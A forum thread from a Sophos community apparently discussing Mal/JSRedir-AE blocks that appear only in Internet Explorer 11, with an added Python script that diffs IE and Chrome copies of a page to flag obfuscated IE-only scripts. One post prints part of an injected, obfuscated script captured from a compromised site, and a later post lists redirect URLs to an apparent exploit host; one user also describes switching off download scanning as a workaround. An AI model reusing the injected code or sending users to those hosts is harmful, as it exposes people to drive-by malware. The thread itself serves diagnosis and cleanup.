Sophos detects Mal/JSRedir-AE with Internet Explorer 11 (11.63.10586.0 update 11.0.26) and no malware with Google Chrome

While browsing the web, Sophos web control blocks some websites if we use IE 11, with the message: Malicious Content Blocked Mal/JSRedir-AE.

Sophos didn't detect anything on the same website with Google Chrome.

Where is the real problem? Is it Sophos and IE11, or the website?

Our solution:

We had to restore an old backup...

  • I have the same issue with a different web site, "ourcommunity-ourkids.org/". IE 11.0.27 detects MAL/JSRedir-AE; in other browsers there is no detection.
  • I was able to create a work around for this issue by opening the Sophos control panel -> Configure Anti-virus and HIPS -> Web Protection -> change the drop down for Download Scanning to Off, then applying the settings. Then open the page in IE; it will open fine. I then changed the setting back to its original setting and the web page still loads without error.
  • Hello Roger,

    "a work around for this issue"
    OK, let's first agree on what the issue is. Please have a look at the analysis for Mal/JSRedir-AE. Guess you shouldn't take it lightly, and I wouldn't recommend working around it. If you look at its Summary page you see "Please send us a sample" (not possible though if it's blocked by download scanning) and that it's a generic detection, which suggests it could be harmless but shouldn't indiscriminately be regarded as safe.

    @Eric and @Roger (and TWIMC)
    As to different results for different browsers: web pages try to be "smart" and tune the page for "optimum user experience" depending on the browser. Thus different scripts, style sheets, and so on might be loaded for different browsers. Unlikely that a redirection is needed to serve important content only when viewed with IE, or? More likely that the (admittedly potential) exploit kit is crafted for IE.
    One of the possible payloads for these drive-by attacks is ransomware (the kind that encrypts your files). Ransomware is not delivered for every request though; it's deliberately served only for a small fraction to "protect" the actual source of the threat. From the user's POV, kinda an inverse lottery. You don't want to be the one which hits the sh*tpot.

    So, please, don't think these detections are written just to annoy you.

    Christian

  • Christian

    Please trust me when I say that I am not taking this lightly; however, I have had my web developer scan my site multiple times, specifically looking for the signatures defined by Sophos. He cannot find any evidence of the virus with the tools we have. If you browse to my site, do you see the issue, and can you tell me what item in the site is infected?

    I personally have scanned my web page with https://app.webinspector.com and that online scanner found no issues.

    With my workaround I have not disabled your product I continue to use the Download scanning option on all websites including the one mentioned; however it appears to be a false positive as after I do the workaround the page is no longer detected as malicious even after reboot and clearing cache.

    Since this is my website I am concerned about this situation and want to make certain the problem is resolved.

    The only detection I get is from the Sophos installed web protection when running IE. I do understand about the different modules loading for different web browsers.

    Any help would be appreciated.

    Roger

  • Hello Roger,

    I'm not Sophos ... anyway, here's part of what's returned when I access the site with IE:
    HTTP/1.1 200 OK
    Date: Thu, 28 Jan 2016 11:35:47 GMT
    Server: Apache
    Set-Cookie: _PHP_SESSION_PHP=423; expires=Thu, 04-Feb-2016 11:35:47 GMT; path=/
    Content-Type: text/html; charset=utf-8
    Connection: close
     
    <!--//--><script> function moveTo(){return true;}function resizeTo(){return true;}
    </script>
    <div id="cvmythmetwel" class="qutbzmrvstg">bgbw. bodla, gajbyakeocrdzabbva r aw bvcdbl
    cl ddamanbx dbasazb zakdudbaya mbzblaoaqa paneg cseodfd zdle. sc y aa. dneudv egdfdhcoe.
    pd rdyc uegdgecacd laibjci, cl axa wc sbl aacfatbuakecdnawcvag azakbmbxbt avcibfcdajbwbabu
    dydidwd webcocoaybn bbckcreadge cadd abbcl, bjclakdrcwefalcdambic nck ajdv cla vacbu
    a lal agbhctex cpdza lbla fcpagb zcl, budjabahb paecl bddz d eecc qebchbeabafbqbnchav.
    bma zccaycla - cccaldmdzd ydtdlas; aj b yahed: d j eudbbv becsacbkcabp c qcmc pbiaobibdebb
    bblbzduboafblboaqamapeg c s - efbcboa mcl aldf a fbiexbt a l albcbjctejcqca bbb zakdfdheqbybgataeafbzanbuaqcjagb
    x aw d lay. clblbzawamdebnanb la xbrback adan bfcfbhdsdgd nddekbfbucpbwag buasdqdddx
    dtecajba df buakclb fbvb 'be' id h agdnbmbpdtae dq ctcbb. bbvaubiddeoac drbdeobyccaya
    rbbetc zcbacbta. j; b nat dgatckb, rbzd ndodg b vajbka zbq: ake cavcqaiedelbyanawayeucm
    erazcbaiclald fa. fbib wbuaq; anag, bjb - de qazbyb bblaldjbfbzcbb ualadambvabbxb
    c b i azbv ak dlbbchcac, aa ncyal bpacerbe bobdcl alcrcqblcachal ab aaeabfckai e
    q aeb. vbf cnaebkcbbpc q dfdlepcvb war, bjdr epd idjdldzcgcjd basdpex cndx cwexdrb
    l dcagdo emej btaqagb c budeemcwe k d: reacsdq, aoclccby a n - drcwem dm dydm! erdfdx
    apd cazcd c i c 97 lctdqctbiagbgcsdscsej</div>
    <div id="bncwobbltqjmy" class="qutbzmrvstg">VQZybhFoVxGoJf6k</div>
    <script>
    var szunqcjoooqqlez=(43655183>1644902541?"o":"\x72\x65");
    var pafbknmwhiahkk=(1493789990<263569207?"woc":"p"); .....

    I'd say this doesn't look really innocent. Injections are often cleverly hidden from local inspection. Don't ask me where, but it is there.
    I don't know of a specific contact at Sophos (and under which conditions and to what extent they will assist in cleaning the site) so you'd have to start with giving Support a call.

    Christian
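
The two points Christian makes above, that a server may hand IE a different set of scripts than it hands Chrome and that the block captured in his IE session carries hex-escaped strings and constant ternaries, are the two things a site owner can check for themselves. The script below is an added example written for this thread; it is not a Sophos tool and not the tool Christian used. It fetches a page once with an IE11 User-Agent and once with a Chrome User-Agent (both UA strings are assumed, illustrative values), extracts inline script blocks, keeps only the ones the IE copy received and Chrome did not, and scores those for the markers visible in the capture. The sample pages embedded in it are constructed for the offline run, not captured from any real site.

```python
import re
import urllib.request
from typing import Dict, List

# Illustrative User-Agent strings (assumed, not taken from the thread). Fetching
# with each shows what the server hands IE11 versus another browser, which is
# the difference Christian describes.
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36")

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Markers of the injected script quoted in the thread: JS hex escapes such as
# "\x72\x65" and integer-comparison ternaries that always resolve to one branch.
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
CONST_TERNARY = re.compile(r'\(\s*\d+\s*[<>]\s*\d+\s*\?\s*"[^"]*"\s*:\s*"[^"]*"\s*\)')


def fetch_as(url: str, user_agent: str, timeout: int = 15) -> str:
    """Download a page body with the given User-Agent; nothing is executed."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_scripts(html: str) -> List[str]:
    """Bodies of all inline <script> blocks, whitespace-normalised for comparison."""
    return [" ".join(m.group(1).split()) for m in SCRIPT_BLOCK.finditer(html)]


def obfuscation_score(script: str) -> int:
    """Number of obfuscation markers found in one script body."""
    return len(HEX_ESCAPE.findall(script)) + len(CONST_TERNARY.findall(script))


def browser_only_scripts(target_html: str, baseline_html: str) -> List[str]:
    """Scripts served to the target browser that the baseline browser never received."""
    baseline = set(extract_scripts(baseline_html))
    return [s for s in extract_scripts(target_html) if s not in baseline]


def triage(target_html: str, baseline_html: str, threshold: int = 3) -> List[Dict[str, object]]:
    """Flag browser-specific script blocks whose obfuscation score meets the threshold."""
    findings = []
    for script in browser_only_scripts(target_html, baseline_html):
        score = obfuscation_score(script)
        if score >= threshold:
            findings.append({"score": score, "snippet": script[:72]})
    return findings


# Constructed sample pages (not captured from any real site). The IE copy
# carries an injected block modelled on the fragment quoted in the thread.
CHROME_HTML = """<html><head><title>Example</title>
<script>function moveTo(){return true;}function resizeTo(){return true;}</script>
</head><body><p>Welcome</p></body></html>"""

IE_HTML = CHROME_HTML.replace("</body>", r"""<div id="cvmythmetwel" class="qutbzmrvstg">bgbw. bodla, gajbyakeocrdzabbva</div>
<script>
var szunqcjoooqqlez=(43655183>1644902541?"o":"\x72\x65");
var pafbknmwhiahkk=(1493789990<263569207?"woc":"p");
</script></body>""")


if __name__ == "__main__":
    # Offline run over the constructed pages. For a live comparison, from an
    # isolated machine, use fetch_as(url, IE11_UA) and fetch_as(url, CHROME_UA).
    for finding in triage(IE_HTML, CHROME_HTML):
        print(f"IE-only script, score {finding['score']}: {finding['snippet']}")
```

The point of diffing against a second browser's copy rather than scanning the whole page is that a site's legitimate scripts are usually identical for every visitor, so whatever appears only in the IE response is the short list worth reading by hand. The diff also tells the site owner which response, and therefore which server-side file or include, produced the extra block, which is the piece of information the later posts in this thread are asking for.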

  • I thank you for your time and assistance you have been very helpful. I will post back when I find the root cause.

    Thanks again.
  • Behaviour is confirmed for the page http://www.campaignforeducation.org. The site seems to be clean; we sent a short notification to the site admin.

    Sophos UTM9
    Firmware version: 9.355-1
    Pattern version: 99487

  • I am experiencing the same issue with my site. I too have used many site scanners and found nothing. Have you discovered a solution?

  • Hello MarkHarris,

    "the same issue"
    meaning you (or someone else) get a Mal/JSRedir-xx alert when browsing with IE11 and otherwise not, or?
    "with my site"
    sorry, but I (and probably this is true for many others) am not aware of and knowledgeable about you and your site; should I be?

    "a solution"
    one of two: either the alert is genuine and your site is compromised, then you have to clean it; or it's a false positive, for this please see Sophos reports that a website is blocked or has access restricted.

    Christian

  • Christian, as in: my own site (www.harrisdigi.com) [and a couple of others I have tested on the shared hosting] are receiving the alert.

    The requested location contains malicious content, identified as Mal/JSRedir-AE

    I had labs look at the alert, and got the following:

    " Initial access to the website harrisdigi.com shows redirection to :
    scheinecontactaient.contract-ready.com/stun/sheep-22493962
    scheinecontactaient.contract-ready.com/monk/mental-32003369.swf"

    I do not know where the redirect code is being called. The logs of Sophos don't list it. I can't watch the page information load on my computer to determine the call because Sophos blocks it. This does not occur in any browser, even Edge, so I can't watch the loading.

    What tool did you use to illustrate the code presence in the other site?

    I have searched my hosting directories, but found nothing I could attribute the redirect to. If I knew the file called just before the redirect I might be able to correct the issue.